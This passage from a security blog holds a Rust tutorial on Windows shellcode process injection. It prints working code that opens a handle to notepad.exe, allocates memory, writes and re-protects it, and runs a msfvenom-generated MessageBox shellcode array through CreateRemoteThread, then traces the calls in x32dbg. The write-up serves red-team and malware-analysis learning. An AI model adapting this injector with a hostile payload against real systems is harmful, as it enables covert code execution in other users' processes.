class="n">target_process</span> <span class="o">=</span> <span class="s">"notepad.exe"</span><span class="p">;</span> <span class="k">let</span> <span class="n">pid</span> <span class="o">=</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process</span><span class="p">);</span> <span class="k">if</span> <span class="n">pid</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"{} not found"</span><span class="p">,</span> <span class="n">target_process</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> Mon, 06 Nov 2023 00:00:00 +0100 https://syrion.me/rustware-part-2-process-enumeration-development/ https://syrion.me/rustware-part-2-process-enumeration-development/ Malware Rustware Windows Rustware Part 1: Shellcode Process Injection Development (Windows) <p>Malware development is essential when performing activities like Red Teaming, Adversary Emulation and Network Penetration Testing, the operator can use custom malwares to perform various tasks based on the specific situation. At the same time, analyzing Malwares is useful to learn how malwares work and how to detect them, in order to defend our companies from threat actors. For these reasons I studied several books and courses about Windows Internals, Malware Development and Malware Analysis.</p> <p>Several threat actors like <strong>ALPHV</strong>, <strong>Hive</strong> and <strong>Qilin</strong> started to develop malware using the Rust programming languages because of its great memory management, speed, and complexity during reverse engineering.</p> <p>In the last months I started to study and develop custom tools using Rust program language. This first blog post is about the development of a binary that performs an injection of a MessageBox into a target process.</p> <p>The Shellcode Process Injection we are going to use relies on the use of several WinAPIs: <strong>OpenProcess</strong> is used to open a handle to the target process, in our case Notepad.exe. We will use this handle to interact with Nodepad.exe , after that, using <strong>VirtualAllocEx</strong> we can allocate a new region of memory in Notepad.exe with Readable and Writable protection; this region will contain our shellcode written by <strong>WriteProcessMemory</strong>. Using <strong>VirtualProtectEx</strong> we can change the memory protection to Readable and Executable to allow <strong>CreateRemoteThread</strong> to run the shellcode contained in the new allocated memory in Notepad.exe .</p> <h2 id="process-injection">Process Injection</h2> <p>The process injection we are going to develop is a simple Shellcode Injection using the following WinAPIs:</p> <ul> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a></strong>: gets a handle to the target process</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex">VirtualAllocEx</a></strong>: allocates memory in the remote target process</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory">WriteProcessMemory</a></strong>: writes our payload into the allocated memory</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex">VirtualProtectEx</a></strong>: changes the remote memory protection</li> <li><strong><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread">CreateRemoteThread</a></strong>: runs our payload</li> </ul> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img1.png" alt="Screenshot" /> <em><center>Figure 1 - Shellcode Process Injection</center></em></p> <p>The payload we are going to use is a message box showing the string “Process Injection”; it was generated using the following msfvenom command.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img2.png" alt="Screenshot" /> <em><center>Figure 2 - msfvenom command</center></em></p> <h2 id="rustware-setup">Rustware Setup</h2> <p>Everything we need to develop a Rust program that leverages on WinAPI, is well described in the Microsoft “<a href="https://learn.microsoft.com/en-us/windows/dev-environment/rust/">Developing with Rust on Windows</a>”. In our case, we used the following software, plugins and crate:</p> <ul> <li>Visual Studio Code 1.83.0</li> <li>Rust-analyzer 0.3.1689</li> <li>CodeLLDB 1.10.0</li> <li>Crates 0.6.3</li> <li>Windows Crate 0.51.1</li> </ul> <h2 id="rustware-development">Rustware Development</h2> <p>First of all, it is necessary to add the Windows Crate to the <strong>Cargo.toml</strong> file to use the WinAPIs, as shown below.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img3.png" alt="Screenshot" /> <em><center>Figure 3 - Cargo.toml File</center></em></p> <p>Each WinAPI requires a feature that must be written in the <strong>Cargo.toml</strong> file; we can see the features in the <a href="https://microsoft.github.io/windows-docs-rs/doc/windows/Win32/System/Threading/fn.OpenProcess.html">Windows Crate documentation</a>.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img4.png" alt="Screenshot" /> <em><center>Figure 4 - Open Process Specification</center></em></p> <p>Below, a list of the WinAPIs we are going to use and the features they require:</p> <ul> <li><strong>OpenProcess</strong>: “Win32_System_Threading” and “Win32_Foundation”</li> <li><strong>VirtualAllocEx</strong>: “Win32_System_Memory”, and “Win32_Foundation”</li> <li><strong>WriteProcessMemory</strong>: “Win32_System_Diagnostics_Debug” and “Win32_Foundation”</li> <li><strong>VirtualProtectEx</strong>: “Win32_System_Memory”, and “Win32_Foundation”</li> <li><strong>CreateRemoteThread</strong>: “Win32_System_Threading”, “Win32_Foundation” and “Win32_Security”.</li> </ul> <p>After adding all the features, the <strong>Cargo.toml</strong> file will look like this.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img5.png" alt="Screenshot" /> <em><center>Figure 5 - Cargo.toml File</center></em></p> <p>Each feature must also be imported in the code; we can achieve this with the use declaration as shown below.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::{</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::</span><span class="n">transmute</span><span class="p">};</span> <span class="k">use</span> <span class="nn">windows</span><span class="p">::{</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">Foundation</span><span class="p">::</span><span class="n">CloseHandle</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">Debug</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Memory</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Threading</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="p">};</span> </code></pre></div></div> <p>In order to get the PID of the target process as argument, we can use the std::env::args. The code below checks if the user has specified the PID as argument, if not, it prints the usage string, otherwise it saves the value in the <strong>pid</strong> variable.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">args</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="nb">String</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nf">args</span><span class="p">()</span><span class="nf">.collect</span><span class="p">();</span> <span class="k">if</span> <span class="n">args</span><span class="nf">.len</span><span class="p">()</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Usage: rustware.exe PID"</span><span class="p">);</span> <span class="k">return</span> <span class="p">}</span> <span class="k">let</span> <span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="n">args</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="nf">.parse</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">();</span> </code></pre></div></div> <p>The payload is contained in an array of 272 unsigned 8-bit integers. The payload length is calculated using the <strong>.len()</strong>. function, and the <strong>.payload_ptr</strong>. variable (use <strong>.std::ffi::c_void</strong>.) contains a pointer to the payload, we get it by using the <strong>.as_ptr()</strong>. to get a raw pointer to the payload and then casting the raw pointer to a <strong>*const c_void</strong>.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">payload</span> <span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">272</span><span class="p">]</span><span class="o">=</span> <span class="p">[</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x9b</span><span class="p">,</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span><span class="mi">0x71</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x46</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x36</span><span class="p">,</span> <span class="mi">0x38</span><span class="p">,</span> <span class="mi">0x4f</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xf3</span><span class="p">,</span> <span class="mi">0x59</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xd1</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x60</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x3c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x54</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x78</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xea</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x4a</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xee</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0xfc</span><span class="p">,</span> <span class="mi">0xac</span><span class="p">,</span> <span class="mi">0x84</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x07</span><span class="p">,</span> <span class="mi">0xc1</span><span class="p">,</span> <span class="mi">0xcf</span><span class="p">,</span> <span class="mi">0x0d</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xc7</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x3b</span><span class="p">,</span> <span class="mi">0x7c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x66</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x4b</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x44</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0xc3</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x29</span><span class="p">,</span> <span class="mi">0xd4</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe5</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0x4e</span><span class="p">,</span> <span class="mi">0x0e</span><span class="p">,</span> <span class="mi">0xec</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x9f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0xd8</span><span class="p">,</span> <span class="mi">0xe2</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x41</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x33</span><span class="p">,</span> <span class="mi">0x32</span><span class="p">,</span> <span class="mi">0x2e</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x0a</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe6</span><span class="p">,</span> <span class="mi">0x56</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0xa8</span><span class="p">,</span> <span class="mi">0xa2</span><span class="p">,</span> <span class="mi">0x4d</span><span class="p">,</span> <span class="mi">0xbc</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x5f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x69</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x6a</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x4c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x11</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x53</span><span class="p">,</span> <span class="mi">0x51</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xd0</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x08</span> <span class="p">];</span> <span class="k">let</span> <span class="n">payload_len</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.len</span><span class="p">();</span> <span class="k">let</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">;</span> </code></pre></div></div> <p>The <strong>Inject</strong> function takes three parameters: the PID of the target process, a pointer to the payload, and the payload length.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">inject</span><span class="p">(</span> <span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">){</span> </code></pre></div></div> <p>The WinAPIs we are going to use are defined as <strong><a href="https://doc.rust-lang.org/book/ch19-01-unsafe-rust.html#calling-an-unsafe-function-or-method">unsafe</a></strong> function, because Rust can’t guarantee the memory safety, so it’s our responsibility. In the image below we can see the <strong>OpenProcess</strong> implementation, it is declared as an <strong>unsafe</strong> function.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img6.png" alt="Screenshot" /> <em><center>Figure 6 - OpenProcess Implementation</center></em></p> <p>In order to use an <strong><a href="https://doc.rust-lang.org/book/ch19-01-unsafe-rust.html#unsafe-rust">unsafe</a></strong> function, we need to add an <strong>unsafe</strong> block; we are going to use this block for all the WinAPIs. Let’s use <strong>OpenProcess</strong> to get a handle to the target process. It returns a <a href="https://doc.rust-lang.org/std/result/enum.Result.html">Result</a> enum containing the Handle to the opened process, or the error if it fails. Using the <strong>match</strong> construct we can use the variants <strong>Ok()</strong> and <strong>Err()</strong> to define what to do if the function succeeds or fails.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">inject</span><span class="p">(</span> <span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">){</span> <span class="k">unsafe</span><span class="p">{</span> <span class="k">let</span> <span class="n">result_openprocess</span> <span class="o">=</span> <span class="nf">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span><span class="k">false</span><span class="p">,</span><span class="n">pid</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_openprocess</span><span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_process</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"OpenProcess succeeds"</span><span class="p">)</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"OpenProcess Error: {}"</span><span class="p">,</span><span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>If the function succeeds the program performs <strong>VirtualAllocEx</strong> to allocate a region of memory that is readable and writable into a remote target process and print the allocated memory address, otherwise it prints an error message. We don’t specify the <strong>lpaddress</strong> because we want the WinAPI to determinate where to allocate the region of memory</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">Ok</span><span class="p">(</span><span class="n">handle_process</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">remotememory_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="nf">VirtualAllocEx</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="nb">None</span><span class="p">,</span><span class="n">payload_len</span><span class="p">,</span><span class="n">MEM_COMMIT</span><span class="p">,</span><span class="n">PAGE_READWRITE</span><span class="p">);</span> <span class="k">if</span> <span class="o">!</span><span class="n">remotememory_ptr</span><span class="nf">.is_null</span><span class="p">(){</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Allocated Memory Address: {:p}"</span><span class="p">,</span><span class="n">remotememory_ptr</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span><span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"VirtualAllocEx Error"</span><span class="p">)</span> <span class="p">}</span> </code></pre></div></div> <p>After that, we have to write our payload in the new allocated memory. To do that we use <strong>WriteProcessMemory</strong>.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">let</span> <span class="n">result_writeprocessmemory</span> <span class="o">=</span> <span class="nf">WriteProcessMemory</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="n">remotememory_ptr</span><span class="p">,</span><span class="n">payload_ptr</span><span class="p">,</span><span class="n">payload_len</span><span class="p">,</span><span class="nb">None</span><span class="p">);</span> </code></pre></div></div> <p>Using <strong>VirtualProtectEx</strong>, it is possible to change the memory protection to <strong>PAGE_EXECUTE_READ</strong> to make the payload executable.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">match</span> <span class="n">result_writeprocessmemory</span><span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_virtualprotectex</span> <span class="o">=</span> <span class="nf">VirtualProtectEx</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="n">remotememory_ptr</span><span class="p">,</span><span class="n">payload_len</span><span class="p">,</span><span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">old_protect</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_virtualprotectex</span><span class="p">{</span> </code></pre></div></div> <p>At this point we can execute our payload using. The <strong>transmute</strong> function allows us to convert the pointer to our payload into a pointer to a function to be executed by the new created Thread as required by the WinAPI.</p> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">match</span> <span class="n">result_virtualprotectex</span><span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_createremotethread</span><span class="o">=</span> <span class="nf">CreateRemoteThread</span><span class="p">(</span><span class="n">handle_process</span><span class="p">,</span><span class="nb">None</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="nf">transmute</span><span class="p">(</span><span class="n">remotememory_ptr</span><span class="p">),</span><span class="nb">None</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="nb">None</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_createremotethread</span><span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">_handle_tread</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Threat Created"</span><span class="p">)</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"CreateRemoteThread Error: {}"</span><span class="p">,</span><span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>To compile the program into a 32bit binary we can use the <strong>target</strong> flag specifying the i686 architecture.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img7.png" alt="Screenshot" /> <em><center>Figure 7 - Compile Program for 32bit architecture</center></em></p> <p>Running the binary we successfully inject our MessageBox into Notepad.exe.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img8.png" alt="Screenshot" /> <em><center>Figure 8 - MessageBox Process Injection in Notepad.exe</center></em></p> <h2 id="debugging">Debugging</h2> <p>Using Process Hacker and x32dbg we can debug our binary to understand how it works under the hood. In x32dbg we can change the command line to specify the target process PID and set the breakpoints on the WinAPIs that our binary is going to use.</p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img9.png" alt="Screenshot" /> <em><center>Figure 9 - Change Command Line</center></em></p> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img10.png" alt="Screenshot" /> <em><center>Figure 10 - x32dbg Breakpoints</center></em></p> <h3 id="openprocess">OpenProcess</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span><span class="k">false</span><span class="p">,</span><span class="n">pid</span><span class="p">)</span> </code></pre></div></div> <p>Running the debugger, we can see that <strong>OpenProcess</strong> is correctly getting the tree parameters:</p> <ul> <li>0x1FFFFF is <strong>PROCESS_ALL_ACCESS</strong></li> <li>0 is false</li> <li>0x1F80 is the Notepad.exe PID in hex</li> </ul> <p><img src="/assets/images/2023-10-27-rustware-part-1-shellcode-process-injection-development/img11.png" alt="Screenshot" /> 